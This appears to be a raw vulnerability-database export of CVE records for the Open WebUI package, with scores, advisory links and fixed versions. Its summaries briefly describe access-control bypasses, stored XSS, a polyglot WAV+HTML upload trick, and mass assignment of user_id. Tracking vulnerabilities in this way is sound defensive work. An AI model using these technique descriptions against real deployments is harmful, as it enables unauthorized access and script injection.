published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-12537
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/blob/e8babe62bc8e466be0367703fd062a981f5c2394/src/lib/apis/utils/index.ts#L25-L56
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/blob/e8babe62bc8e466be0367703fd062a981f5c2394/src/lib/apis/utils/index.ts#L25-L56
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-12537
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-12537
4
reference_url https://huntr.com/bounties/edabd06c-acc0-428c-a481-271f333755bc
reference_id edabd06c-acc0-428c-a481-271f333755bc
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-20T14:28:33Z/
url https://huntr.com/bounties/edabd06c-acc0-428c-a481-271f333755bc
5
reference_url https://github.com/advisories/GHSA-chf7-q7m5-fq92
reference_id GHSA-chf7-q7m5-fq92
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-chf7-q7m5-fq92
fixed_packages
0
url pkg:pypi/open-webui@0.3.33.dev1
purl pkg:pypi/open-webui@0.3.33.dev1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1svn-zazq-e3f2
3
vulnerability VCID-1tu1-b9de-nfaa
4
vulnerability VCID-2rs8-62x1-s7h7
5
vulnerability VCID-2xdz-v8cw-fygv
6
vulnerability VCID-32yb-vsfs-43a8
7
vulnerability VCID-3436-znsq-guds
8
vulnerability VCID-4rz6-hw32-jueb
9
vulnerability VCID-4sn4-mrbm-dfgh
10
vulnerability VCID-4v8w-kv6g-kkbc
11
vulnerability VCID-4x63-8x64-d3bq
12
vulnerability VCID-5319-t7jm-y3bx
13
vulnerability VCID-5jna-wvd7-j7cm
14
vulnerability VCID-5wfg-zqcy-c7ar
15
vulnerability VCID-5wzn-mfwg-ybc3
16
vulnerability VCID-66zh-9jk7-9bfx
17
vulnerability VCID-68jf-2utx-x7br
18
vulnerability VCID-6rbm-rm25-hqgy
19
vulnerability VCID-7j5a-pu4k-kucf
20
vulnerability VCID-7nbc-ng1s-suck
21
vulnerability VCID-8n6u-wgz9-1bgj
22
vulnerability VCID-8nzh-cpda-dkca
23
vulnerability VCID-8qvj-xndv-v3ay
24
vulnerability VCID-8y4k-pj2n-8uhm
25
vulnerability VCID-94nj-qkdf-xfhn
26
vulnerability VCID-9jud-sr2a-8yc3
27
vulnerability VCID-9zyk-459z-x3a4
28
vulnerability VCID-chug-ma8r-cucc
29
vulnerability VCID-cw4k-3s8z-uqh8
30
vulnerability VCID-dz6g-jgmg-wqce
31
vulnerability VCID-dzh3-rqx4-fqhv
32
vulnerability VCID-ef1t-pxjm-j7cz
33
vulnerability VCID-gw77-ux3j-qfaa
34
vulnerability VCID-hj5f-yk3y-ffdg
35
vulnerability VCID-jfs9-dps1-27a2
36
vulnerability VCID-jnsg-u9dy-r3d5
37
vulnerability VCID-k17g-bd9g-67f7
38
vulnerability VCID-k9jf-5jzd-pkge
39
vulnerability VCID-mn21-kwuu-w7by
40
vulnerability VCID-n4ma-zcpv-5fbp
41
vulnerability VCID-nxvm-97r4-6ybz
42
vulnerability VCID-pkds-1xgn-q3bv
43
vulnerability VCID-pvep-chj7-ekeg
44
vulnerability VCID-pwsg-72yy-quhk
45
vulnerability VCID-q682-k826-efhv
46
vulnerability VCID-qgfh-7u8n-y7c7
47
vulnerability VCID-qjt1-zxx8-r7ht
48
vulnerability VCID-r7vt-4bqm-f7hb
49
vulnerability VCID-reqw-pfm8-c7g5
50
vulnerability VCID-rhhj-rccv-87hw
51
vulnerability VCID-s625-eg1w-gfd1
52
vulnerability VCID-t571-d65a-cyb2
53
vulnerability VCID-tz2k-gazs-mqgd
54
vulnerability VCID-u25g-p4nx-gqd1
55
vulnerability VCID-ujye-g4rj-8be5
56
vulnerability VCID-um53-kf7u-kkg6
57
vulnerability VCID-vghe-uuzj-m7cu
58
vulnerability VCID-vkx3-71kv-sugt
59
vulnerability VCID-w2vd-r3hr-w3bt
60
vulnerability VCID-wb88-83cj-ffhy
61
vulnerability VCID-wcz4-vwx4-tufb
62
vulnerability VCID-yug9-shts-kufb
63
vulnerability VCID-yysb-dk2k-f7g4
64
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.3.33.dev1
aliases CVE-2024-12537, GHSA-chf7-q7m5-fq92
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-vj38-mn12-v7br
61
url VCID-vkx3-71kv-sugt
vulnerability_id VCID-vkx3-71kv-sugt
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, Open WebUI supports model composition via base_model_id: a user-defined model (e.g., "Cheap Assistant") can reference an existing base model (e.g., "gpt-4-turbo-restricted") that provides the actual inference capability. When a user queries the composed model, the access control pipeline verifies the user has access to the composed model but never re-verifies access to the chained base model. Additionally, the model creation and import endpoints accept arbitrary base_model_id values without checking that the caller has access to that base model. Combined, this allows any user with the default model creation permission to create a model that chains to a restricted base model — and then invoke it, causing the server to dispatch the request to the restricted base model using the admin-configured API key. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44555
reference_id
reference_type
scores
0
value 0.00045
scoring_system epss
scoring_elements 0.1431
published_at 2026-06-14T12:55:00Z
1
value 0.00045
scoring_system epss
scoring_elements 0.14217
published_at 2026-06-11T12:55:00Z
2
value 0.00045
scoring_system epss
scoring_elements 0.14336
published_at 2026-06-13T12:55:00Z
3
value 0.00045
scoring_system epss
scoring_elements 0.14337
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44555
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44555
reference_id
reference_type
scores
0
value 7.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44555
3
reference_url https://github.com/advisories/GHSA-9vvh-qmjx-p4q8
reference_id GHSA-9vvh-qmjx-p4q8
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-9vvh-qmjx-p4q8
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-9vvh-qmjx-p4q8
reference_id GHSA-9vvh-qmjx-p4q8
reference_type
scores
0
value 7.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T20:21:00Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-9vvh-qmjx-p4q8
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44555, GHSA-9vvh-qmjx-p4q8
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-vkx3-71kv-sugt
62
url VCID-w2vd-r3hr-w3bt
vulnerability_id VCID-w2vd-r3hr-w3bt
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, a stored cross-site scripting (XSS) vulnerability that allows any authenticated user with model creation permission (workspace.models) to execute arbitrary JavaScript in the browser of any other user (including admins) who views the malicious model in the chat UI. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44721
reference_id
reference_type
scores
0
value 0.00036
scoring_system epss
scoring_elements 0.11145
published_at 2026-06-12T12:55:00Z
1
value 0.00036
scoring_system epss
scoring_elements 0.11107
published_at 2026-06-14T12:55:00Z
2
value 0.00036
scoring_system epss
scoring_elements 0.11078
published_at 2026-06-11T12:55:00Z
3
value 0.00036
scoring_system epss
scoring_elements 0.11139
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44721
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44721
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44721
3
reference_url https://github.com/advisories/GHSA-gf5m-wcrh-7928
reference_id GHSA-gf5m-wcrh-7928
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-gf5m-wcrh-7928
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-gf5m-wcrh-7928
reference_id GHSA-gf5m-wcrh-7928
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-19T12:37:29Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-gf5m-wcrh-7928
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44721, GHSA-gf5m-wcrh-7928
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-w2vd-r3hr-w3bt
63
url VCID-wb88-83cj-ffhy
vulnerability_id VCID-wb88-83cj-ffhy
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.9, when a regular user [non-admin] logs into the application, a http://IP:8080/api/models? web request is initiated by the application and in response, it reveals the system prompt of available models set by admin on models pages in workspace affecting the confidentiality of application. This vulnerability is fixed in 0.8.9.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45351
reference_id
reference_type
scores
0
value 0.00038
scoring_system epss
scoring_elements 0.1183
published_at 2026-06-12T12:55:00Z
1
value 0.00038
scoring_system epss
scoring_elements 0.11803
published_at 2026-06-14T12:55:00Z
2
value 0.00038
scoring_system epss
scoring_elements 0.11744
published_at 2026-06-11T12:55:00Z
3
value 0.00038
scoring_system epss
scoring_elements 0.11826
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45351
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.8.9
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.8.9
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45351
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45351
4
reference_url https://github.com/advisories/GHSA-jh9g-8jqw-m2qx
reference_id GHSA-jh9g-8jqw-m2qx
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jh9g-8jqw-m2qx
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-jh9g-8jqw-m2qx
reference_id GHSA-jh9g-8jqw-m2qx
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-18T19:39:16Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-jh9g-8jqw-m2qx
fixed_packages
0
url pkg:pypi/open-webui@0.8.9
purl pkg:pypi/open-webui@0.8.9
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2xdz-v8cw-fygv
4
vulnerability VCID-32yb-vsfs-43a8
5
vulnerability VCID-3436-znsq-guds
6
vulnerability VCID-4v8w-kv6g-kkbc
7
vulnerability VCID-4x63-8x64-d3bq
8
vulnerability VCID-5319-t7jm-y3bx
9
vulnerability VCID-5jna-wvd7-j7cm
10
vulnerability VCID-5wfg-zqcy-c7ar
11
vulnerability VCID-5wzn-mfwg-ybc3
12
vulnerability VCID-6rbm-rm25-hqgy
13
vulnerability VCID-8nzh-cpda-dkca
14
vulnerability VCID-8y4k-pj2n-8uhm
15
vulnerability VCID-chug-ma8r-cucc
16
vulnerability VCID-cw4k-3s8z-uqh8
17
vulnerability VCID-dz6g-jgmg-wqce
18
vulnerability VCID-dzh3-rqx4-fqhv
19
vulnerability VCID-ef1t-pxjm-j7cz
20
vulnerability VCID-hj5f-yk3y-ffdg
21
vulnerability VCID-jfs9-dps1-27a2
22
vulnerability VCID-k9jf-5jzd-pkge
23
vulnerability VCID-n4ma-zcpv-5fbp
24
vulnerability VCID-nxvm-97r4-6ybz
25
vulnerability VCID-pkds-1xgn-q3bv
26
vulnerability VCID-q682-k826-efhv
27
vulnerability VCID-qgfh-7u8n-y7c7
28
vulnerability VCID-qjt1-zxx8-r7ht
29
vulnerability VCID-r7vt-4bqm-f7hb
30
vulnerability VCID-reqw-pfm8-c7g5
31
vulnerability VCID-rhhj-rccv-87hw
32
vulnerability VCID-s625-eg1w-gfd1
33
vulnerability VCID-t571-d65a-cyb2
34
vulnerability VCID-um53-kf7u-kkg6
35
vulnerability VCID-vghe-uuzj-m7cu
36
vulnerability VCID-vkx3-71kv-sugt
37
vulnerability VCID-w2vd-r3hr-w3bt
38
vulnerability VCID-wcz4-vwx4-tufb
39
vulnerability VCID-yug9-shts-kufb
40
vulnerability VCID-yysb-dk2k-f7g4
41
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.9
aliases CVE-2026-45351, GHSA-jh9g-8jqw-m2qx
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-wb88-83cj-ffhy
64
url VCID-wcz4-vwx4-tufb
vulnerability_id VCID-wcz4-vwx4-tufb
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.3, the audio transcription upload endpoint takes the file extension from the user-supplied filename and saves the file under CACHE_DIR/audio/transcriptions/.. The /cache/{path} route serves these files via FileResponse, which sets Content-Type from the on-disk extension and emits no Content-Disposition. A verified user with the default-on chat.stt permission can upload a polyglot WAV+HTML file named pwn.html and trick any other user into opening the resulting URL — the response comes back as text/html and any embedded <script> runs in the Open WebUI origin. This vulnerability is fixed in 0.9.3.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45315
reference_id
reference_type
scores
0
value 6e-05
scoring_system epss
scoring_elements 0.0047
published_at 2026-06-14T12:55:00Z
1
value 6e-05
scoring_system epss
scoring_elements 0.00463
published_at 2026-06-11T12:55:00Z
2
value 6e-05
scoring_system epss
scoring_elements 0.0046
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45315
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.9.3
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.9.3
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45315
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45315
4
reference_url https://github.com/advisories/GHSA-m8f9-9whg-f4xr
reference_id GHSA-m8f9-9whg-f4xr
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-m8f9-9whg-f4xr
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-m8f9-9whg-f4xr
reference_id GHSA-m8f9-9whg-f4xr
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-19T12:23:26Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-m8f9-9whg-f4xr
fixed_packages
0
url pkg:pypi/open-webui@0.9.3
purl pkg:pypi/open-webui@0.9.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-cw4k-3s8z-uqh8
6
vulnerability VCID-dzh3-rqx4-fqhv
7
vulnerability VCID-ef1t-pxjm-j7cz
8
vulnerability VCID-hj5f-yk3y-ffdg
9
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.3
aliases CVE-2026-45315, GHSA-m8f9-9whg-f4xr
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-wcz4-vwx4-tufb
65
url VCID-wja7-68ea-mug6
vulnerability_id VCID-wja7-68ea-mug6
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.3.16, a missing permission check in all files related API endpoints allows any authenticated user to list, access and delete every file uploaded by every user to the platform. This vulnerability is fixed in 0.3.16.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45301
reference_id
reference_type
scores
0
value 0.00033
scoring_system epss
scoring_elements 0.10283
published_at 2026-06-12T12:55:00Z
1
value 0.00033
scoring_system epss
scoring_elements 0.10269
published_at 2026-06-14T12:55:00Z
2
value 0.00033
scoring_system epss
scoring_elements 0.10234
published_at 2026-06-11T12:55:00Z
3
value 0.00033
scoring_system epss
scoring_elements 0.10286
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45301
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45301
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45301
3
reference_url https://github.com/advisories/GHSA-r8wh-8m7r-fh33
reference_id GHSA-r8wh-8m7r-fh33
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-r8wh-8m7r-fh33
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-r8wh-8m7r-fh33
reference_id GHSA-r8wh-8m7r-fh33
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-18T19:40:58Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-r8wh-8m7r-fh33
fixed_packages
0
url pkg:pypi/open-webui@0.3.16
purl pkg:pypi/open-webui@0.3.16
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1svn-zazq-e3f2
3
vulnerability VCID-1tu1-b9de-nfaa
4
vulnerability VCID-2rs8-62x1-s7h7
5
vulnerability VCID-2xdz-v8cw-fygv
6
vulnerability VCID-32yb-vsfs-43a8
7
vulnerability VCID-3436-znsq-guds
8
vulnerability VCID-3hv8-ys1d-63a6
9
vulnerability VCID-4rz6-hw32-jueb
10
vulnerability VCID-4sn4-mrbm-dfgh
11
vulnerability VCID-4v8w-kv6g-kkbc
12
vulnerability VCID-4x63-8x64-d3bq
13
vulnerability VCID-5319-t7jm-y3bx
14
vulnerability VCID-5jna-wvd7-j7cm
15
vulnerability VCID-5wfg-zqcy-c7ar
16
vulnerability VCID-5wzn-mfwg-ybc3
17
vulnerability VCID-66zh-9jk7-9bfx
18
vulnerability VCID-68jf-2utx-x7br
19
vulnerability VCID-6rbm-rm25-hqgy
20
vulnerability VCID-7j5a-pu4k-kucf
21
vulnerability VCID-7nbc-ng1s-suck
22
vulnerability VCID-8n6u-wgz9-1bgj
23
vulnerability VCID-8nzh-cpda-dkca
24
vulnerability VCID-8qvj-xndv-v3ay
25
vulnerability VCID-8y4k-pj2n-8uhm
26
vulnerability VCID-94nj-qkdf-xfhn
27
vulnerability VCID-9jud-sr2a-8yc3
28
vulnerability VCID-9zyk-459z-x3a4
29
vulnerability VCID-chug-ma8r-cucc
30
vulnerability VCID-cw4k-3s8z-uqh8
31
vulnerability VCID-dz6g-jgmg-wqce
32
vulnerability VCID-dzh3-rqx4-fqhv
33
vulnerability VCID-ef1t-pxjm-j7cz
34
vulnerability VCID-gw77-ux3j-qfaa
35
vulnerability VCID-hj5f-yk3y-ffdg
36
vulnerability VCID-jfs9-dps1-27a2
37
vulnerability VCID-jnsg-u9dy-r3d5
38
vulnerability VCID-k17g-bd9g-67f7
39
vulnerability VCID-k9jf-5jzd-pkge
40
vulnerability VCID-mn21-kwuu-w7by
41
vulnerability VCID-n4ma-zcpv-5fbp
42
vulnerability VCID-nxvm-97r4-6ybz
43
vulnerability VCID-pkds-1xgn-q3bv
44
vulnerability VCID-pvep-chj7-ekeg
45
vulnerability VCID-pwsg-72yy-quhk
46
vulnerability VCID-q682-k826-efhv
47
vulnerability VCID-qgfh-7u8n-y7c7
48
vulnerability VCID-qjt1-zxx8-r7ht
49
vulnerability VCID-r7vt-4bqm-f7hb
50
vulnerability VCID-reqw-pfm8-c7g5
51
vulnerability VCID-rhhj-rccv-87hw
52
vulnerability VCID-s625-eg1w-gfd1
53
vulnerability VCID-t571-d65a-cyb2
54
vulnerability VCID-tz2k-gazs-mqgd
55
vulnerability VCID-u25g-p4nx-gqd1
56
vulnerability VCID-ujye-g4rj-8be5
57
vulnerability VCID-um53-kf7u-kkg6
58
vulnerability VCID-vghe-uuzj-m7cu
59
vulnerability VCID-vj38-mn12-v7br
60
vulnerability VCID-vkx3-71kv-sugt
61
vulnerability VCID-w2vd-r3hr-w3bt
62
vulnerability VCID-wb88-83cj-ffhy
63
vulnerability VCID-wcz4-vwx4-tufb
64
vulnerability VCID-yug9-shts-kufb
65
vulnerability VCID-yysb-dk2k-f7g4
66
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.3.16
aliases CVE-2026-45301, GHSA-r8wh-8m7r-fh33
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-wja7-68ea-mug6
66
url VCID-yug9-shts-kufb
vulnerability_id VCID-yug9-shts-kufb
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, the POST /api/v1/evaluations/feedback endpoint in Open WebUI v0.9.2 is vulnerable to mass assignment via FeedbackForm, which uses model_config = ConfigDict(extra='allow'). Due to an insecure dictionary merge order in insert_new_feedback(), an authenticated attacker can inject a user_id field in the request body that overwrites the server-derived value, creating feedback records attributed to any arbitrary user. This corrupts the model evaluation leaderboard (Elo ratings) and enables identity spoofing. This vulnerability is fixed in 0.9.5.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45396
reference_id
reference_type
scores
0
value 0.00043
scoring_system epss
scoring_elements 0.13588
published_at 2026-06-13T12:55:00Z
1
value 0.00043
scoring_system epss
scoring_elements 0.13562
published_at 2026-06-14T12:55:00Z
2
value 0.00043
scoring_system epss
scoring_elements 0.13467
published_at 2026-06-11T12:55:00Z
3
value 0.00043
scoring_system epss
scoring_elements 0.13586
published_at 2026-06-12T12:55:00Z
